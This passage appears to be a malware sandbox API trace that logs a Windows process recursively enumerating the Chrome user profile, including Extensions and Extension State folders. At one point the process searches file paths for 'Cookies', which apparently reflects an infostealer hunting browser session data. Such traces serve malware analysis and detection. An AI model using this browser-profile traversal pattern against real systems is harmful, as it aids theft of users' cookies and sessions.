HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0163.213] lstrlenW (lpString="MANIFEST-000001") returned 15 [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9257a0 [0163.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" [0163.213] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.213] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001", lpSrch="Cookies") returned 0x0 [0163.213] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.214] GetProcessHeap () returned 0x8e0000 [0163.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.214] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0163.214] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0163.214] VirtualQuery (in: lpAddress=0x925610, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.214] GetProcessHeap () returned 0x8e0000 [0163.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925610 | out: hHeap=0x8e0000) returned 1 [0163.214] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.214] GetProcessHeap () returned 0x8e0000 [0163.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.214] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0163.214] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0163.215] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0163.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.215] lstrlenW (lpString="\\") returned 1 [0163.215] GetProcessHeap () returned 0x8e0000 [0163.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.215] lstrlenW (lpString="Extensions") returned 10 [0163.215] GetProcessHeap () returned 0x8e0000 [0163.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xae) returned 0x925550 [0163.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0163.215] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.215] GetProcessHeap () returned 0x8e0000 [0163.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.215] lstrlenW (lpString="\\*.*") returned 4 [0163.215] GetProcessHeap () returned 0x8e0000 [0163.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb6) returned 0x925608 [0163.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0163.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*" [0163.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.215] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.215] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.215] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.216] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aapocclcgogkmnckokdopfmhonfmgoek", cAlternateFileName="AAPOCC~1")) returned 1 [0163.216] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2=".") returned 1 [0163.216] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="..") returned 1 [0163.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.216] lstrlenW (lpString="\\") returned 1 [0163.216] GetProcessHeap () returned 0x8e0000 [0163.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9256c8 [0163.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0163.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0163.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 87 [0163.216] lstrlenW (lpString="aapocclcgogkmnckokdopfmhonfmgoek") returned 32 [0163.216] GetProcessHeap () returned 0x8e0000 [0163.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf0) returned 0x925780 [0163.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0163.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", lpString2="aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0163.216] VirtualQuery (in: lpAddress=0x9256c8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.216] GetProcessHeap () returned 0x8e0000 [0163.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c8 | out: hHeap=0x8e0000) returned 1 [0163.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0163.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0163.216] lstrlenW (lpString="\\*.*") returned 4 [0163.216] GetProcessHeap () returned 0x8e0000 [0163.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x925878 [0163.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0163.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*" [0163.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*", lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0163.217] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.217] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName="..", cAlternateFileName="")) returned 1 [0163.217] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.217] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.217] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0163.217] lstrcmpiW (lpString1="0.9_0", lpString2=".") returned 1 [0163.217] lstrcmpiW (lpString1="0.9_0", lpString2="..") returned 1 [0163.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0163.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0163.217] lstrlenW (lpString="\\") returned 1 [0163.217] GetProcessHeap () returned 0x8e0000 [0163.217] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf2) returned 0x925978 [0163.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0163.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" [0163.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned 120 [0163.217] lstrlenW (lpString="0.9_0") returned 5 [0163.217] GetProcessHeap () returned 0x8e0000 [0163.217] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x917cc0 [0163.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" [0163.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", lpString2="0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.217] VirtualQuery (in: lpAddress=0x925978, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.217] GetProcessHeap () returned 0x8e0000 [0163.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925978 | out: hHeap=0x8e0000) returned 1 [0163.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.217] lstrlenW (lpString="\\*.*") returned 4 [0163.217] GetProcessHeap () returned 0x8e0000 [0163.217] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x104) returned 0x925978 [0163.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*" [0163.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*", lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b80 [0163.218] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.218] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.218] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.218] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.218] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0163.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.218] lstrlenW (lpString="\\") returned 1 [0163.218] GetProcessHeap () returned 0x8e0000 [0163.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.218] lstrlenW (lpString="icon_128.png") returned 12 [0163.218] GetProcessHeap () returned 